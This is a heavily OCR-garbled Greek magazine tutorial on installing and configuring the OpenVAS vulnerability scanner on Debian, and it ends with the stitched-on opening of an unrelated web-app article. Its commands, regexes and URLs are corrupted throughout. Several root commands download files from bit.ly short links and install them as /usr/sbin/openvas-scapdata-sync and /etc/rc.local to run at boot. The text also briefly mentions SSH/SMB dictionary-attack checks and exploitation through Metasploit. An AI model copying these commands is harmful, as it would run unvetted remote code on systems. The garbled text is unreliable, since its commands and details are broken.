φησης, ακολουθήστε την οδό Tou encrypted LVM. Αν το κάνετε, ἐχετε KATA 
VOU ὁτι κάθε φορά NOU πρὀκειται να φορτώσει το λειτουργικὀ, προκειµένου va 
ολοκληρώνεται το boot θα ζητείται το κατάλληλο password yia την anokpu- 
πτογράφηση του δίσκου. 


Δεν υπάρχει λόγος να έχουμε διαφορετικἁ διαμερίσματα για το /home ἡ το /usr κ.λπ. 
Ένα µόνο διαμέρισμα προσαρτηµένο στον ριζικὀ κατάλογο, εἶναι ὁ,τι πρέπει. 


moves; «Sp: selects; «Enter» activates buttons 


ο Όλοι οι κατάλογοι και τα αρχεία θα µπουν κάτω ano μία κατάτµηση (yia την 


ακρίβεια κάτω ano To root partition). Εμείς τουλάχιστον δεν εἰχαμε λὀγο va 
φτιάξουμε ξεχωριστὲς κατατμήσεις, N.X., για τον κατάλογο /home ἡ για Tov / 
usr. 

Λἰγο πριν o installer περάσει στο κύριο μέρος της εργασἰας του, oro Software 
Selection ερωτώµαστε για ro av θα εγκατασταθούν κάποιες συλλογές πακὲ- 
των ἡ OXI. Αφήσαμε τη συλλογή Standard system utilities, καθώς και την SSH 
server: Θέλαμε να έχουμε δυνατότητα για απομακρυσμένη, ασφαλἠ σύνδεση 
µέσω SSH, αµέσως µετά την ολοκλήρωση της εγκατάστασης. Όπως εξάλλου 
μπορείτε να δείτε και στο OXETIKO screenshot, η πρώτη and τις συλλογές εἶναι 
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n Debian desktop environment. Πα £va box/VM που χρησιμεύει κυρίως yia va 
τρέχει TO OpenVAS, εννοείται ότι δεν υπάρχει κανένας λόγος για περιβάλλον 
γραφικών, εφαρμογὲς desktop κ.ο.κ. 


Να σημειώσουμε επίσης ὁτι κατά τη διάρκεια της εγκατάστασης το Debian ρυθµἰζε- 
ται ὥστε να παἰρνει διεύθυνση IP αυτόματα, ano τον ónoio DHCP server του τοπικού 
δικτύου. Μετά την εγκατάσταση, το box ἡ το VM pe rov OpenVAS server εἶναι πιθανό 
να μετακινείται ano δίκτυο σε δίκτυο. Ακριβώς γι' αυτόν το λὀγο δεν επεµβαίνουµε 
στις ρυθμίσεις που αφορούν στη δικτύωση, αλλά αφήνουμε το σύστημα va τις δι- 
ευθετεἰ αυτόματα. 


Πα τον OpenVAS server µας, εννοείται πως *ógv* θέλουμε πακέτα ano τη συλλογή Debian 
desktop environment. Θέλουμε, όμως, να έχουμε έχουμε ασφαλή πρόσβαση µέσω SSH aro 
box/VM — και μάλιστα αμέσως µετά την ολοκλήρωση της εγκατάστασης. 


selects; <Enter> ac es buttons 


Προετοιμασία για To OpenVAS κι εγκατάσταση 


To Debian εἶναι εγκατεστημένο κι ἑτοιμο, έχουμε συνδεθεἰ στο λογαριασμό του xph- 
στη root (τοπικἁ, ano την κονσόλα ἡ απομακρυσμένα, µέσω SSH) και δουλεύου- 
µε ano εκεί. Επειδἠ κάναμε δικτυακή εγκατάσταση, αυτή τη στιγµἠ δεν χρειάζεται 
να Φρεσκάρουµε ra αποθετἠρια (repositories) Tou Debian, οὐτε v' αναβαθµίσουµε 
εφαρμογὲς και λειτουργικό σύστημα. Σε περίπτωση που δεν κάνατε δικτυακἡ EYKA- 
τάσταση, φρεσκάρετε τώρα τα repositories µε 

root@ovasbox:~# 
και περάστε τυχούσες αναβαθμίσεις µε 

root@ovasbox: ~# 


Παρατηρώντας εξάλλου την οθόνη (ἡ την κονσόλα Tou VM) κατά την εκκίνηση rou 
Debian, θα δείτε OT! στο τέλος της διαδικασίας η οθὀνη (rj n κονσόλα) καθαρίζει 
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απότομα ano ra διάφορα μηνύματα, και μένουν δύο µόνο γραμμὲς (η δεύτερη εἶναι 
για To login). Δεν υπάρχει θέµα μ' GUTH τη συμπεριφορά, εκτὸς ἴσως απὀ το γεγονὸς 
ότι δεν προλαβαίνουµε να βλέπουμε τυχόντα μηνύματα λάθους. Σε λίγο, nou θα 
φροντίσουμε για την αυτόματη εκκἰνηση των διαφόρων υπηρεσιών του OpenVAS, 
τουλάχιστον στις πρῶτες µας δοκιμὲς θέλουμε να βλέπουμε αν όλα xouv πάει καλὰ 
ἡ όχι. Ανοίγουμε, λοιπὀν, το αρχείο /etc/inittab (π.χ., µε ro nano) 


root@ovasbox:~# nano /etc/inittab 

εντοπἰζουµε τη γραμμή 
1:2345:respawn:/sbin/getty 38400 tty1 

και την τροποποιούµε ελαφρώς, WOTE να γίνει σαν την ακόλουθη: 
1:2345:respawn:/sbin/getty --noclear 38400 tty1 


Αποθηκεύουµε την αλλαγή κι εγκαταλείπουµε Tov editor ([CTRL+O], [Enter] και 
[CTRL+X] για To nano) κι αν εἶναι κάνουμε κι Eva reboot, oore να δούμε τη διαφο- 
pd. Προσθέτουμε στη συνέχεια repositories του OpenVAS 6 για ro Debian, τα onoia 
παίρνουμε ano την υπηρεσία openSUSE Build Service (OBS, https://build.opensuse. 
org): 
root@ovasbox:~# echo "deb http://download.opensuse.org/repositories/ 
security: /OpenVAS: /UNSTABLE:/v6/Debian 7.0/ ./" >> /etc/apt/sources.list 


root@ovasbox:~# wget http://download.opensuse.org/repositories/security:/ 
OpenVAS : /UNSTABLE: /v6/Debian_7.@/Release. key 


root@ovasbox:~# apt-key add ./Release.key 
root@ovasbox:~# apt-get update 


Πριν συνεχίσουμε, δεν εἶναι άσχημη ιδέα va κἄνουμε κάτι για εκείνα τα enipova κι 
ἄκρως ενοχλητικἁ μηνύματα µε locale warnings, τα οποία εμφανίζονται κατὰ τις 
εγκαταστάσεις πακέτων. Ανοίγουμε µε TO nano το αρχείο /etc/default/locale και 
φροντἰζουμε ὥστε σ' αυτό να υπάρχουν και να ορίζονται *TpEIG* μεταβλητές: οι 
LANG, LC. ALL και LANGUAGE. Καλό εἶναι να 'xouv την ἴδια τιµή (όνομα locale) η 
οποία, φυσικά, θα πρέπει va αντιστοιχεἰ στη γλὠσσα που επιλέξαμε πριν Aiyo, κατά 
τη διαδικασία εγκατάστασης του Debian. Δείτε, n.x., Ta περιεχόμενα του δικού µας 
αρχείου: 


LANG-en US.UTF-8 
LC ALL-en US.UTF-8 
LANGUAGE-en US.UTF-8 


(Προτιμάμε τα μηνύματα στα AyyAika.) Npoxwpaue τώρα στην εγκατάσταση των 
διαφόρων υπηρεσιών του OpenVAS, καθώς και κάποιων απαραίτητων εφαρμογών, 
εργαλείων και βιβλιοθηκών: 


root@ovasbox:~# apt-get -y install greenbone-security-assistant openvas- 
cli openvas-manager openvas-scanner openvas-administrator sqlite3 xsltproc 
rsync 


root@ovasbox:~# apt-get -y install texlive-latex-base texlive-latex-extra 
texlive-latex-recommended htmldoc 


root@ovasbox:~# apt-get -y install alien rpm nsis fakeroot 
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H εγκατάσταση θα nape! κἄποια opa yia να ολοκληρωθεἰ. Βεβαίως, εδὠ εἶναι µια 
απὀ εκείνες τις περιπτώσεις ὀπου η γρήγορη σύνδεση στο ἱντερνετ βοηθἀ σηµαντι- 
κά. 

Αρχικἠ ρύθμιση του OpenVAS 


Δημιουργούμε Eva πιστοποιητικὀ για την Αρχἠ Πιστοποίησης (Certificate Authority, 
CA) του OpenVAS, καθώς κι Eva για τον iðio Tov server. 


root@ovasbox:~# openvas-mkcert 


This script will now ask you the relevant information 
to create the SSL certificate of OpenVAS. Note that this 
information will *NOT* be sent to anybody (everything 
stays local), but anyone with the ability to connect to 
your OpenVAS daemon will be able to retrieve this 
information. 

CA certificate life time in days [1460]: 

Server certificate life time in days [365]: 1460 

Your country (two letter code) [DE]: GR 

Your state or province name [none]: CentralMacedonia 
Your location (e.g. town) [Berlin]: Thessaloniki 


Your organization [OpenVAS Users United]: 


Congratulations. Your server certificate was properly 
created. 
The following files were created: 
Certification authority: 
Certificate - /var/lib/openvas/CA/cacert.pem 
Private key - /var/lib/openvas/private/CA/cakey.pem 
. OpenVAS Server : 
Certificate - /var/lib/openvas/CA/servercert.pem 
Private key = /var/lib/openvas/private/CA/serverkey.pem 
Press [ENTER] to exit 
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Παρατηρήστε ὁτι τόσο για το πιστοποιητικὀ της Αρχής, 000 και για εκείνο του server, 
ορἰσαμε τον ἰδιο χρόνο ζωής (1460 μέρες, δηλαδὴ 4 χρόνια). Με pia µόνο κίνηση, 
φτιάχνουμε κι £va πιστοποιητικὀ για τους πελάτες του OpenVAS: 


root@ovasbox:~# openvas-mkcert-client -n om -1 
Generating RSA private key, 1024 bit long modulus 

. .++++++ 

AEE ++++++ 

e is 65537 (0x10001) 

You are about to be asked to enter information that 


will be incorporated into your certificate request. 


What you are about to enter is what is called a 
Distinguished Name or a DN. 

There are quite a few fields but you can leave 

some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 

Country Name (2 letter code) [DE]: 

State or Province Name (full name) [Some-State]: 

Locality Name (eg, city) []: 

Organization Name (eg, company) [Internet Widgits Pty Ltd]: 
Organizational Unit Name (eg, section) []: 

Common Name (eg, your name or your server's hostname) []: 
Email Address []: 

Using configuration from /tmp/openvas-mkcert-client.2797/stdC.cnf 
Check that the request matches the signature 

Signature ok 


The Subject's Distinguished Name is as follows 


countryName : PRINTABLE: 'DE' 
localityName : PRINTABLE: 'Berlin' 
commonName : PRINTABLE: 'om' 


Certificate is to be certified until Jan 28 14:57:13 2015 GMT (365 days) 
Write out database with 1 new entries 

Data Base Updated 

User om added to OpenVAS. 
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'Opa yia τον πρὠτο συγχρονισμό της τοπικἠς συλλογής µε Ta NVTs (Network 
Vulnerability Tests) του OpenVAS: 


root@ovasbox:~# mkdir -p /var/lib/openvas/plugins/private 
root@ovasbox:~# openvas-nvt-sync 
Ξεκινάμε τον OpenVAS Scanner daemon: 
root@ovasbox:~# openvassd 
Loading the OpenVAS plugins...base gpgme-Message: 
Setting GnuPG homedir to '/etc/openvas/gnupg' 
base gpgme-Message: 
Using OpenPGP engine version '1.4.12' 
All plugins loaded 
Θα χρειαστεἰ λίγη opa ro φόρτωμα των NVTs —aurr| τη στιγµἠ περί τις 34 χιλιάδες 
εἶναι το πλήθος τους--, ωστόσο αυτό εἶναι απὀλυτα φυσιολογικὀ. Προηγουμένως, 
παρεμπιπτόντως, ὀταν κατεβάζαμε πακέτα προς εγκατάσταση, σημαντικὸς ἦταν o 
ρόλος της ιντερνετικἠὴς σύνδεσης. Σ' αυτό το στάδιο, σημασία ἐχει av ro Debian 
κατοικεἰ σε KAGOIKO δίσκο ἡ σε SSD. Αφού ολοκληρώσει το openvassd την εργασία 
του, ἐρχεται η opa για το κατέβασμα της βάσης SCAP (Security Content Automation 
Protocol, http://bit.ly/whatisSCAP). Την εργασία αυτή επιτελεἰ ro σκριπτάκι ονόματι 
openvas-scapdata-sync, στον κατάλογο /usr/sbin. Πριν το kaA&oouue, οφείλουμε 
να του κάνουμε µια µικρή αλλά σημαντικἠ τροποποίηση. Το ανοίγουμε µε TO nano 
root@ovasbox:~# nano /usr/sbin/openvas-scapdata-sync 
εντοπἰζουµε αυτή τη γραμμὴ 
&& [ -n "echo "$timestamp raw" | egrep -x "[0-9](4)^-(e[0-9]|1[012]) V -([0- 
2][0e-9]|3[01])[:alnum:]*"^ ] 
και την αντικαθιστούμε μ' αυτή: 
88 [ -n "echo "$timestamp raw" | egrep -x "[0-9](4)^-(e[0-9]|1[012]) V -([0- 
2][0e-9]|3[01]) [[:a1num:]]* ^ 1 
Πα va µην παιδεύεστε µε την πληκτρολὀγηση, µπορείτε να κατεβάσετε τη διορθω- 
μένη εκδοχἠ του openvas-scap-data-sync και να αντικαταστήσετε την πρωτότυπη: 
root@ovasbox:~# wget http://bit.ly/dh@28scapsync -O openvas-scapdata-sync 
root@ovasbox:~# mv openvas-scapdata-sync /usr/sbin 
root@ovasbox:~# chmod 755 /usr/sbin/openvas-scapdata-sync 
Μια χαρά. Ac kareBácouyue τώρα και τη βάση SCAP: 
root@ovasbox:~# mkdir -p /var/lib/openvas/scap-data/private 
root@ovasbox:~# openvas-scapdata-sync 
H διαδικασία θα xpeiaotei αρκετά λεπτά για να ολοκληρωθεἰ. Υπάρχει εξάλλου και η 
βάση CERT (www.cert.org/vuls) που επἰσης χρησιμοποιεί To OpenVAS, για την onoia 
διατίθεται GAAO Eva σκριπτάκι. Πρόκειται για το openvas-certdata-sync, στον KA- 


τἄλογο /usr/sbin, µε αποστολἠ ro κατέβασμα και το συγχρονισμό της βάσης. Σε 
αντίθεση µε το openvas-scapdata-sync, που εἶδαμε πριν λἰγο, το openvas-certdata- 
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sync δεν χρειάζεται va το τροποποιήσουμε για να λειτουργήσει σωστά. Αν όμως το 
τρἐξουµε, μετὰ ano λἰγο θα πάρουμε μηνύματα λάθους για διάφορους πίνακες της 
βάσης SQLite που λείπουν, και η óÀn διαδικασία θα αποτύχει παταγωδώς. Ευτυχώς, 
το πρὀβλημα διορθώνεται κατεβάζοντας, αρχικἁ, Eva πακἐτο RPM ano το αποθετἠ- 
pio Atomic για ro Fedora Linux, το onoio κι αποσυμµπιἐζουµε. Anó τους καταλόγους 
που προκύπτουν αντιγράφουµε ἑνα συγκεκριµένο αρχείο SQL (για τη βάση SQLite) 
και δύο επἰσης συγκεκριµένα αρχεία XSL (eXtensible Stylesheet Language, http:// 
en.wikipedia.org/wiki/XSL), στον κατάλογο /usr/share/openvas/cert. Αλλά δεν 
χρειάζεται να πάρετε ολόκληρο ro RPM. Έχουμε ἠδη φτιάξει Eva µικρὀ archive, µε 
τα απαραίτητα αρχεία (.sql, .xsl) και μόνον αυτά: 

root@ovasbox:~# wget http://bit.ly/dh@28certfiles -0 certfiles.tar 

root@ovasbox:~# tar xvf certfiles.tar 

cert/ 

cert/dfn_cert_update. xsl 

cert/dfn cert getbyname.xsl 

cert/cert db init.sql 

root@ovasbox:~# mkdir /usr/share/openvas/cert 

root@ovasbox:~# cp cert/* /usr/share/openvas/cert 

root@ovasbox:~# openvas-certdata-sync 
Έχουμε κάνει σημαντικἠ πρὀοδο όσον αφορά στην αρχικἠ ρύθμιση του OpenVAS 
και, NIOTEWTE µας, τα δύσκολα εἶναι πίσω µας”. Στρἐφουµε ropa λἰγο την προσοχὴ 
μας στον OpenVAS Manager (openvasmd). Ano τη στιγμή που o OpenVAS Scanner 
(openvassd) τρέχει, προχωράμε σε µια ανακατασκευἠ της βάσης rou manager: 

root@ovasbox:~# openvasmd --rebuild 
Θα περιμένετε λίγη opa μέχρι va ολοκληρωθεί η ανακατασκευἠ αλλά, OAEG αυτὲς 
οι αναμονὲς, μέχρι τώρα μᾶλλον θα σας ἐχουν κάνει απαθεἰς κι αδιάφορους :) Στη 
συνέχεια παίρνουμε KI ἑνα αντίγραφο εφεδρεἰας της βάσης του manager: 

root@ovasbox:~# openvasmd --backup 
Δημιουργούμε ἐναν νέο χρήστη yia To OpenVAS, µε δικαιώματα διαχειριστή: 

root@ovasbox:~# openvasad -c add_user -n ovasadmin -r Admin 

Enter password: 


ad | main:MESSAGE:2535:2014-01-28 19h53.24 EET: No rules file provided, the 
new user will have no restrictions. 


ad main:MESSAGE:2535:2014-01-28 19h53.24 EET: User ovasadmin has been 

successfully created. 
Napatnpnote ὁτι το ὀνομα του νέου χρήστη δίνεται στην παράμετρο -n (εμείς, N.X., 
TOV ονομάσαμε ovasadmin). Μας ζητείται συνθηµατικὀ (password), το οποίο nàn- 
κτρολογούμε και φροντίζουμε ὥστε να µην το ξεχάσουμε’. Ξεκινάμε τον OpenVAS 
Manager daemon, ως εξἠς: 

root@ovasbox:~# openvasmd -ρ 9390 


2. Πάντα ἠθελα va το γράψω *kar* auró. 
3. LastPass: vai, Post-it: oy! 
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EnavaAaugáàvouus ομοίως και για Tov OpenVAS Administrator daemon: 
root@ovasbox:~# openvasad -p 9393 


Τέλος, σηκώνουμε και τον Greenbone Security Assistant (GSA), ὥστε va διαχειριζὀ- 
μαστε ro OpenVAS µέσω rou βολικού web panel που παρέχει o πρώτος: 


root@ovasbox:~# gsad -p 9392 --listen=10.20.30.100 


Τώρα, Ooo! ἐχετε παρακολουθήσει ro deltaCast 502601 (http://deltahacker.gr/ 
deltacast-s02e01), σίγουρα θα παρατηρήσατε OT! ano Ta openvasmd κι openvasad 
παραλείψαμε την παράμετρο -a. AUTO το κάναμε διότι δεν θέλουμε οι αντίστοιχες 
υπηρεσίες va αφουγκράζονται για αιτήσεις πελατών *puóvov* ano Eva συγκεκρι- 
μένο network interface, αλλά απ' όλα τα διαθέσιμα. Εν προκειμένω, ἐχουμε δύο 
interfaces: εκείνο rou localhost (το loopback) κι εκεϊνο της κάρτας Ethernet (το 
eth0), µέσω της οποίας ro λειτουργικὀ βγαἰνει στον ἐξω κόσμο. Δείτε λίγο και πώς 
ξεκινήσαμε τον GSA: Evo στο deltaCast 502601 rou εἰπαμε να περιμένει πελάτες 
στη διεύθυνση 127.0.0.1 (το loopback interface), dpa πρακτικἁ να δέχεται συνδέσεις 
μόνον ano τους web browsers του ἰδιου υπολογιστή, TOpa TOU εἶπαμε να περιμένει 
πελάτες στη διεύθυνση 10.20.30.100. Αυτή εἶναι η διεύθυνση IP nou ἐχει αντιστοιχι- 
στεἰ στο Ethernet interface του Debian, ano τον DHCP server oto LAN που κάνουμε 
τις δοκιμές µας. Προφανώς, η εν Aóyo διεύθυνση θα εἶναι διαφορετικἠ στην nepi- 
πτωσἠ σας. Πα va τη βρείτε, στην κονσόλα τρέξτε το ifconfig. Παράδειγμα: 


root@ovasbox:~# ifconfig 

etho Link encap:Ethernet HWaddr 08:00:27:1b:99:fd 
inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0 
inet6 addr: fe80::a00:27ff:fe1b:99fd/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:150@ Metric:1 
RX packets:104260 errors:0 dropped:0 overruns:@ frame:0 
TX packets:96200 errors:@ dropped:0 overruns:0 carrier:0 
collisions:@ txqueuelen:1000 


RX bytes:34973687 (33.3 MiB) TX bytes:18209518 (17.3 MiB) 


Ὅπως και να "χει, ETO! ὁπως τρἐξαµε TO GSA rou επιτρἑψαµε να δέχεται πελάτες 
ano όλα τα μηχανήματα του τοπικού δικτύου, μέσα στο οποίο βρίσκεται το Debian. 
Στο σημείο autò παροτρύνεστε να κάνετε µια πρώτη σύνδεση στον OpenVAS 
server, ουσιαστικά μέσω του GSA, ano κάποιο ἄλλο box/VM του ἰδιου τοπικού 
δικτύου. Τρέξτε τον αγαπημένο σας web browser κι επισκεφτείτε τη διεύθυνση 
https://10.20.30.100:9392 (αλλάξτε ro IP µε το σωστὸ yia την περἰπτωσή σας). 
Την πρώτη Popa nou θα επιχειρήσετε σύνδεση θα πάρετε προειδοποιήσεις για self- 
signed certificate. Δεν υπάρχει θέμα, το πιστοποιητικὀ TOU server μπορεὶ va εἶναι 
self-signed (δεν έχει υπογραφεἰ ano κάποια ανεξάρτητη Αρχἠ Πιστοποίησης), ωστὀ- 
σο το φτιάξαμε εμείς οι ἴδιοι και βεβαίως το εµπιστευόµαστε, ONOTE τώρα λέμε στον 
web browser va το εμπιστευτεἰ κι αυτός. Κάνουμε login στο λογαριασμὀὸ του χρήστη 
που δημιουργήσαμε πριν λίγο, µε το openvasad (στο παράδειγμά µαςτον ονομάσαμε 
ovasadmin). 
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Παίξτε Aiyo µε το περιβάλλον Tou GSA αλλά κάποια στιγμὴ επιστρέψτε, γιατὶ ακόμα 
έχουμε θέµατα (sic). Πώς, n.x., φροντίζουμε, WOTE ὀλες οι απαραἰτητες υπηρεσίες va 
EKKIVOUV αυτόματα κάθε φορά που ξεκινά το λειτουργικό; Επίσης: Το box/VM παὶρ- 
νει δυναμικἀ IP, ano ὀποιον DHCP server απαντήσει στις αιτήσεις TOU για αντιστοἰ- 
χιση διεύθυνσης. Πώς εἶναι δυνατὸν να γνωρἰζουμε ro IP που κάθε φορά παίρνει To 
μηχάνημα, ὥστε o GSA, που ξεκινά αυτόματα, να περιμένει για πελάτες στη σωστὴ 
διεύθυνση IP; Συνεχίστε το διάβασμα. 


Applications Wed Jan 29 5:05 PM 


Greenbone Security Assistant 
€» c wala https;/192.168.85.95:9392/0gin/login.html 


μα Security details fatacker vi 
ge- 


Self-signed 
The signing certificate authority is not known. 


Password 


To πιστοποιητικὀ Tou OpenVAS server δεν ἐχει υπογραφεί 

ano kárioia ανεξάρτητη Αρχή Πιστοποίησης. Ἐτσι, την πρώτη 
φορά που επιχειρούµε σύνδεση µέσω του Greenbone Security 
Assistant, ο web browser δικαιολογημένα θορυβείται. 


Μέριμνα για αυτόματη εκκίνηση 


Με την εγκατάσταση των πακέτων του OpenVAS, παίρνουμε και κάποια init scripts 
για την αυτόματη ενεργοποίηση των σχετικὠν υπηρεσιών (openvassd, openvasmd, 
openvasad, 6584) κατὰ την εκκίνηση του λειτουργικού συστήματος. Στην πράξη 
εἰχαμε διάφορα προβλήματα µε ra συγκεκριµένα scripts, ONOTE φροντἰσαμε WOTE οι 
απαιτούμενες υπηρεσίες να ενεργοποιούνται µε τη βοήθεια Tou script ονόματι /etc/ 
rc.local, το οποίο στο Debian εκτελείται αυτόματα αμέσως µετά την ολοκλήρωση της 
εκκἰνησης του λειτουργικού. Κατεβάστε το rc.local: 


root@ovasbox:~# wget http://bit.ly/dh@28rclocal -O rc.local 
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Κρατήστε ¿va αντίγραφο ano το πρωτότυπο: 
root@ovasbox:~# cp /etc/rc.local /etc/rc.local.orig 

Στη θέση του παλιού βάλτε ro VEO, που μόλις κατεβάσατε: 
root@ovasbox:~# mv rc.local /etc/rc.local 

Τέλος, Φροντίστε ώστε να εἶναι εκτελἐσιμο: 
root@ovasbox:~# chmod 755 /etc/rc.local 


Αν τώρα ρἰξετε µια ματιὰ στα περιεχόμενα του αρχείου rc.local, θα Seite OT! κἀνει 
τα ακόλουθα: 


ο ενημερώνει την τοπικἠ συλλογή µε Ta NVTs 

ο ξεκινά τον OpenVAS Scanner 

ο ενημερώνει την τοπικἠ βάση SCAP 

ο ενημερώνει την τοπική βάση CERT 

e επανακατασκευάζει τη βάση του OpenVAS Manager 


ο ξεκινά τον OpenVAS Manager, µε τρόπο WOTE ν' ακούει για αιτήσεις πελατών 
an' ὁλα τα διαθέσιµα network interfaces 


ο ξεκινά Tov OpenVAS Administrator, µε τρόπο ὡστε επἰσης ν' ακούει για αιτἠ- 
σεις πελατών απ' όλα τα διαθέσιμα network interfaces 


ο ξεκινά τον Greenbone Security Assistant, ο οποίος περιμένει για πελάτες στη 
διεύθυνση IP nou ἐχει πάρει το Debian box/VM ano τον τοπικὀ DHCP server. 


Επειδή η διεύθυνση nou παΐρνει ro Debian δεν εἶναι σταθερή, τη μαθαίνουμε ouv- 
δυάζοντας τα εργαλεία xargs, awk, sed — και την αποδίδουµε στη μεταβλητή theIP. 
(Αλήθεια, πὼς ra nàre µε Ta regular expressions; Ίσως θελήσετε να διαβάσετε τα 
σχετικἀ άρθρα στα τεύχη 021, 022, 023 και 024.) Προκειμένου να βεβαιωθείτε (ki 
εσεἰς) ότι TO rc.local κάνει τη δουλειά που υπόσχεται, ENAVEKKIVNOTE τώρα ro Debian. 
Θυμόσαστε στην αρχἠ του άρθρου εκείνη την παράμετρο, τη --noclear, που βάλαμε 
στην κατάλληλη γραμμή rou /etc/inittab; E, χάρη σ' αυτή την παράμετρο, αν παρ' 
ελπίδα οι εργασἰες που εκτελούνται ano το rc.local παρουσιάσουν κἀποιο πρόβλημα 
(λέμε τώρα), θα μπορέσουμε να δούμε στην κονσόλα το σχετικὀ μήνυμα λάθους. Ka- 
λού κακού --κι επειδἠ ποτὲ δεν µπορείἰς va 'σαι 100% σίγουρος--, όταν ολοκληρωθεὶ 
η εκκίνηση rou Debian και τελειώσουν ὀλες οι εργασίες του rc.local, ano Eva ἆλλο 
μηχάνημα συνδεθείτε στο web panel rou Greenbone Security Assistant και παίξτε 
λίγο µε το OpenVAS. Λογικά, όλα θα δουλεύουν ρολὀι. 


Κλειδιά GnuPG για encrypted credentials 


Όπως μπορείτε va δείτε ano To web panel του GSA, o OpenVAS Scanner ἐχει τη 
δυνατότητα ελέγχου credentials για υπηρεσίες SSH και SMB (διαµοίραση αρχεἰ- 
ων). Ουσιαστικά, δίνουμε éva username και µια λίστα µε passwords, οπὀτε ro npó- 
γραμμα ελέγχει αν µπορεἰ va συνδεθεί στην υπηρεσία SSH ἠ/και SMB rou unya- 
νήματος ἡ των μηχανημάτων που σκανάρουµε, συνδυάζοντας το username µε τα 
passwords. Αυτό που κάνει, δηλαδή, εἶναι Eva dictionary attack µε βάση τα στοιχεία 
που του γνωστοποιήσαμε. Τα passwords που δίνουμε στο OpenVAS αποθηκεύονται 
στο σύστημα σε κρυπτογραφημένη µορφή, ωστόσο για να γίνει αυτό πρέπει npo- 
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Ta init scripts που συνοδεύουν διάφορα precompiled packages 
Tou OpenVAS 6 (σ' αυτή την ἐκδοση επικεντρώσαμε την προσο- 
χἠ µας), διαπιστώσαμε ὀτι συχνά παρουσιάζουν uikporipoBArjua- 
τα. Ακριβώς γι’ αυτό τροποποιήσαµε κατάλληλα το αρχείο /etc/ 
rc.local, ὦστε ὀλες οι υπηρεσίες που σχετίζονται µε το OpenVAS 
να ενεργοποιούνται αυτόματα αμέσως µετά την εκκίνηση του 
Debian. Επίσης, αυτόματα ενημερώνονται η τοπική συλλογή µε 
τα NVTs και oi βάσεις SCAP και CERT. 


τα να φτιάξουμε Eva ζεύγος κλειδιὼν GnuPG. (Περισσότερα για το GnuPG ἡ GPG, 
µπορείτε να διαβάσετε στο site του περιοδικού: http://deltahacker.gr/?p=1982 και 
http://deltahacker. gr/?p=1988) 


Συνδεόμαστε λοιπὸν ως root στο box/VM pe ro OpenVAS και δημιουργούμε vav νὲο 
κατάλογο yia την φιλοξενία των κλειδιών: 


root@ovasbox: t 
Μετὰ προχωράμε στη δηµιουργία τους, µε τη βοήθεια του openvasmd: 
root@ovasbox: ~# 


H διαδικασία θα διαρκέσει APKETH opa, χωρίς μάλιστα va ἐχουµμε κἄποια ἐνδειξη για 
την πρὀοδὀ της. AUTO όμως εἰναι εντελὠς φυσιολογικό. Όταν ολοκληρωθεί η ερ- 
yaoia του openvasmd, θα πάρουμε σχετικὀ μήνυμα και στο σημείο αυτό πρέπει να 
επανεκκικήσουμε τον OpenVAS Manager: 


root()ovasbox: ~# 
root@ovasbox: ~# 


Εναλλακτικά, κάνουμε µια επανεκκίνηση στο λειτουργικὀ. 
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Διαφήμιση yia τη συνέχεια, αλλά και yia πράγµατα nou θα ἐρθουν! 


‘Eva επιθυμητό χαρακτηριστικὀ του OpenVAS server εἶναι η αυτόματη αποστολἠ 
email µε συνημμένη την αναφορά —n.x., σε popo PDF— ενὸς vulnerability scan 
που μόλις ολοκληρώθηκε. Από το περιβάλλον του GSA βλέπουμε Ori η σχετική ðu- 
νατότητα παρέχεται, μόνο nou το box µας δεν εἶναι σε θέση va στέλνει emails. H 
αποστολἠ email θα ἦταν χρήσιμη και για ἄλλους λόγους, ὁπως, π.χ., προκειµένου 
va ενηµερωνόμαστε για τη διεύθυνση IP που ἐχει πάρει o server ano τον τοπικό (γι' 
αυτόν) DHCP server. H ρύθμιση rou Debian για να στέλνει emails Χόχι μόνο” στους 
τοπικοὺς χρήστες του συστήματος, εἶναι Eva θέμα που θα µας απασχολἠσει σε επὀ- 
μενο ἀρθρο. 


Σκεφτείτε όμως και το ἄλλο. Ἐτσι ὁπως λειτουργεί το box/VM που φτιάξαμε, αν sipa- 
OTE εκτὸς δικτύου Oa πρέπει, µε κἄποιο τρόπον, να αποκτήσουμε πρὀσβαση σ' αυτό 
και µετά στον OpenVAS server. H σύνδεση στο απομακρυσμένο δίκτυο µπορεί να γίνει 
µε διάφορους τρόπους, όπως, N.X., µέσω OpenVPN (βλ., π.χ., http://deltahacker.gr/ 
raspberry-openvpn). Ti γίνεται όμως αν δεν υπάρχει διαθἐσιµος OpenVPN server ἠ/και 
δεν έχουμε πρὀσβαση σ' αυτόν; Παρόμοιοι προβληματισμοί ισχύουν και για ἄλλους 
τρόπους σύνδεσης, ὀπως, N.X., εἶναι το SSH tunneling. H λύση εἶναι σοκαριστικἀ απλἠ 
— τουλάχιστον ως ιδέα: Αντἰ να επιχειρούµε να συνδεθούμµε εμείς µε τον OpenVAS 
server, θα προσπαθεἰ εκείνος να συνδεθεί μ' εμάς — ενδεχομένως µέσω ενός τρίτου 
μηχανήματος rj VPS που ἐχουμε στον ἐλεγχὸ µας. To noc NOPE! να γίνει κάτι τέτοιο 
θα αποτελέσει TO θέμα ἄλλου --εξαιρετικά ενδιαφέροντος, θέλουμε να πιστεύουμε-- 
άρθρου. 


Προς ro παρὀν διαβάστε το άρθρο που αρχίζει ano τη σελἰδα 42 του τεύχους, ὀπου 
βλέπουμε noc συνδεόμαστε απομακρυσμένα στον OpenVAS server µέσα and το 
Metasploit, καθώς και noc βάζουμε τις δύο εφαρμογές να συνεργαστούν. Το επι- 
θυμητὀ αποτέλεσµα εἶναι μᾶλλον προφανές: Εντοπισμός αδυναμιών ασφαλείας σε 
συστήματα, φυσικὰ και εκμετάλλευσή τους για απόκτηση πρὀσβασης! 


y OpenVAS 


‘ Open B Vulnerability Assessment System 
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Στο προηγούμενο άρθρο της σειράς, στο deltaHacker 027, κατασκευάσαµε την npo- 
τη µας "πραγματική" εφαρμογἠ web: ἑνα βιβλίο επισκεπτὠν. Ως "πραγματική" opi- 
ζουμε εκείνη την εφαρµογἠ που αποθηκεύει κι αντλεἰ δεδοµένα anó τον server. 
Πρόκειται για ἑναν εντελώς αυθαίρετο ορισμό, ο οποίος ωστόσο ξεκαθἀριζε τους 
στὀχους µας. Τα δεδοµένα του βιβλίου επισκεπτὠν αποθηκεύονταν σε Eva αρχείο 
απλού κειµένου (ñ flat file, ὀπως συνηθἰζουµε να λέμε). Av και η αξία των flat files 
